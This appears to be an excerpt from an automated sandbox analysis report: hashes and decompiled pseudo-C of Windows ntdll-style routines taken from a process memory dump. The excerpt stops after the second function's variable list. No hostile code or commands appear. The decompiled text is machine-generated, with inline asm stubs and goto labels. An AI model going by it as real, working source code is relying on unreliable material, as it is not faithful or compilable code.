Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: 4b6162e8d35eaab5f4011db87fce06a16fc90e65ca325814c580dad745e2432d
Instruction ID: 048d73d0b37550b1b9ab8c81af6ff105f69a2417ee43d64f392f4bce411a911d
Opcode Fuzzy Hash: 4b6162e8d35eaab5f4011db87fce06a16fc90e65ca325814c580dad745e2432d
Instruction Fuzzy Hash: 1711E171910548EFEB22DB98CC49F98BBB1FB18704F548058E208E72A1CF399B40CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01885BA5, Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E01885BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x1891178);
				E0180D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E01884C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E017FD000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E01885542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x18a60e8;
								if( *0x18a60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x18a60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E017F9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E017F6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E017FF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E017FF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E017FF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E017FFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E017FFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E017FF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E017FF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E01884CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0180D130(_t427, _t494, _t511);
				}
			}

0x01885ba5
0x01885baa
0x01885baf
0x01885bb4
0x01885bb6
0x01885bbc
0x01885bbe
0x01885bc4
0x01885bcd
0x01885bd3
0x01885bd6
0x01885bdc
0x01885be0
0x01885be3
0x01885beb
0x01885bf2
0x01885bf8
0x01885bfe
0x01885c04
0x01885c0e
0x01885c18
0x01885c1f
0x01885c25
0x01885c2a
0x01885c2c
0x01885c32
0x01885c3a
0x01885c3f
0x01885c42
0x01885c48
0x01885c5b
0x01885c5b
0x01885c2c
0x01885cb7
0x01885cb9
0x01885cbf
0x01885cc2
0x01885cca
0x01885ccb
0x01885ccb
0x01885cd1
0x01885cd7
0x01885cda
0x01885ce1
0x01885ce4
0x01885ce7
0x01885ced
0x01885cf3
0x01885cf9
0x01885cff
0x01885d08
0x01885d0a
0x01885d0e
0x01885d10
0x00000000
0x00000000
0x01885d16
0x01885d1a
0x00000000
0x00000000
0x01885d20
0x01885d22
0x01885d25
0x01885d2f
0x01885d2f
0x01885d33
0x01885d3d
0x01885d49
0x01885d4b
0x00000000
0x00000000
0x01885d5a
0x01885d5d
0x01885d60
0x00000000
0x00000000
0x01885d66
0x01885d69
0x00000000
0x00000000
0x01885d6f
0x01885d6f
0x01885d73
0x01885d79
0x01885d7f
0x01885d86
0x01885d95
0x01885d98
0x01885dba
0x01885dcb
0x01885dce
0x01885dd3
0x01885dd6
0x01885dd8
0x01885de6
0x01885dec
0x01885dee
0x01885df1
0x01885df3
0x0188635a
0x0188635a
0x00000000
0x0188635a
0x01885dfe
0x01885e02
0x01885e05
0x01885e07
0x01885e10
0x01885e13
0x01885e1b
0x01885e1c
0x01885e21
0x01885e22
0x01885e23
0x01885e25
0x01885e2a
0x01885e2c
0x01885e2e
0x01885e36
0x01885e39
0x01885e42
0x01885e47
0x01885e4d
0x01885e54
0x01885e54
0x01885e54
0x01885e2e
0x01885e5c
0x01885e5f
0x01885e62
0x01885e64
0x01885e6b
0x01885e70
0x01885e7a
0x01885e7a
0x01885e7a
0x01885e6b
0x01885e7e
0x01885e7f
0x01885e7f
0x01885e81
0x01885e87
0x01885e8b
0x01885e8c
0x01885e8c
0x01885e8c
0x01885e9a
0x01885e9c
0x01885ea2
0x01885ea6
0x01885f50
0x01885f50
0x01885f57
0x01885f66
0x01885f66
0x01885f66
0x01885f68
0x01885f6a
0x018863d0
0x00000000
0x01885f70
0x01885f70
0x01885f91
0x01885f9c
0x01885f9e
0x01885fa4
0x01885fa6
0x0188638c
0x01886392
0x018863a1
0x018863a7
0x018863af
0x018863af
0x018863bd
0x018863d8
0x00000000
0x018863d8
0x01885fac
0x01885fb2
0x01885fb4
0x01885fbd
0x01885fc6
0x01885fce
0x01885fd4
0x01885fdc
0x01885fec
0x01885fed
0x01885fee
0x01885fef
0x01885ff9
0x01885ffa
0x01885ffb
0x01885ffc
0x01886000
0x01886004
0x01886012
0x01886012
0x01886018
0x01886019
0x0188601a
0x0188601b
0x0188601c
0x01886020
0x01886059
0x0188605c
0x01886061
0x01886061
0x01886022
0x01886022
0x01886022
0x01886025
0x0188602a
0x0188602b
0x01886031
0x01886037
0x01886038
0x0188603e
0x01886048
0x01886049
0x0188604a
0x0188604b
0x0188604c
0x0188604d
0x01886053
0x01886054
0x01886054
0x01886062
0x01886065
0x01886067
0x0188606a
0x01886070
0x01886075
0x01886076
0x01886081
0x01886087
0x01886095
0x01886099
0x0188609e
0x018860a4
0x018860ae
0x018860b0
0x018860b3
0x018860b6
0x018860b8
0x018860ba
0x018860ba
0x018860ba
0x018860ba
0x018860be
0x018860c0
0x018860c5
0x018860c5
0x018860c5
0x018860c6
0x018860cd
0x01886114
0x018860cf
0x018860cf
0x018860d4
0x018860d5
0x018860da
0x018860db
0x018860e1
0x018860e2
0x018860e8
0x018860f8
0x018860fd
0x018860fe
0x01886102
0x01886104
0x01886107
0x01886109
0x0188610b
0x0188610b
0x0188610b
0x0188610b
0x0188610f
0x0188610f
0x01886117
0x0188611a
0x0188611f
0x01886125
0x01886134
0x01886139
0x0188613f
0x01886146
0x01886148
0x0188614b
0x0188614d
0x0188614f
0x0188614f
0x0188614f
0x0188614f
0x01886153
0x01886159
0x01886159
0x0188615c
0x01886163
0x01886169
0x0188616c
0x01886172
0x01886181
0x01886186
0x01886187
0x0188618b
0x01886191
0x01886195
0x018861a3
0x018861bb
0x018861c0
0x018861c3
0x018861cc
0x018861d0
0x018861dc
0x018861de
0x018861e1
0x018861e4
0x018861e6
0x018861e8
0x018861e8
0x018861e8
0x018861e8
0x018861e6
0x018861ec
0x018861f3
0x01886203
0x01886209
0x0188620a
0x01886216
0x0188621d
0x01886227
0x01886241
0x01886246
0x0188624c
0x01886257
0x01886259
0x0188625c
0x0188625e
0x01886260
0x01886260
0x01886260
0x01886260
0x0188625e
0x01886264
0x01886267
0x01886269
0x01886315
0x01886315
0x0188631b
0x0188631e
0x01886324
0x01886327
0x0188632f
0x01886330
0x01886333
0x0188633a
0x0188633c
0x01886335
0x01886335
0x01886335
0x0188633f
0x01886342
0x0188634c
0x01886352
0x01886355
0x01886355
0x01886359
0x00000000
0x0188626f
0x01886275
0x01886275
0x01886278
0x0188627e
0x0188627e
0x01886281
0x01886287
0x0188628d
0x01886298
0x0188629c
0x018862a2
0x0188629e
0x0188629e
0x0188629e
0x018862a7
0x018862a7
0x018862aa
0x018862b0
0x018862f0
0x018862f0
0x018862f2
0x018862f8
0x018862fd
0x018862b2
0x018862b2
0x018862b2
0x018862b5
0x018862dd
0x018862e2
0x018862e5
0x018862b7
0x018862b8
0x018862bb
0x018862bd
0x018862c0
0x018862c4
0x018862cd
0x018862cd
0x018862c0
0x018862bb
0x018862b5
0x01886302
0x01886303
0x01886305
0x01886305
0x01886305
0x0188630c
0x0188630c
0x00000000
0x0188627e
0x01886269
0x01885eac
0x01885ebb
0x01885ebe
0x01885ecb
0x01885ecb
0x01885ece
0x01885ece
0x01885ed4
0x01885ed7
0x01885ed9
0x01885edb
0x01885edb
0x01885ee1
0x01885ee1
0x01885ee3
0x01885f20
0x01885f20
0x01885ee5
0x01885ee5
0x01885ee5
0x01885ee8
0x01885f11
0x01885f18
0x01885eea
0x01885eea
0x01885eed
0x01885ef2
0x01885ef8
0x01885efb
0x01885f0a
0x01885f0a
0x01885eed
0x01885ee8
0x01885f22
0x01885f28
0x00000000
0x00000000
0x01885f30
0x01885f31
0x01885f37
0x01885f3a
0x01885f3d
0x01885f44
0x00000000
0x00000000
0x00000000
0x01885f46
0x01885f48
0x01885f4d
0x00000000
0x01885f4d
0x01885dda
0x01885ddf
0x00000000
0x01885ddf
0x01885dd8
0x01885da7
0x01885da9
0x01885dac
0x01885dae
0x00000000
0x01885db4
0x01885db4
0x00000000
0x01885db4
0x01885dae
0x01885d88
0x01885d8d
0x01886363
0x01886369
0x0188636a
0x01886370
0x01886372
0x0188637a
0x0188637b
0x0188637d
0x00000000
0x00000000
0x0188637f
0x01886385
0x00000000
0x01886385
0x01885d38
0x01885d3b
0x00000000
0x00000000
0x00000000
0x01885d3b
0x01885d27
0x01885d29
0x00000000
0x00000000
0x00000000
0x01886360
0x00000000
0x01886360
0x01885c10
0x01885c10
0x018863da
0x018863e5
0x018863e5

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41a4462313070e2086366ffcef33ff86b7b3da2553ec6fd5a6f4b0de58617201
Instruction ID: 2a60737e5b291ac00c92e75d7364ebaba2a014014490ff1b3586fa79455c4219
Opcode Fuzzy Hash: 41a4462313070e2086366ffcef33ff86b7b3da2553ec6fd5a6f4b0de58617201
Instruction Fuzzy Hash: E7422B75900229CFDB24DF68C880BA9BBB1FF45304F1581AAD94DEB342E774AA85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 017D4120, Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E017D4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
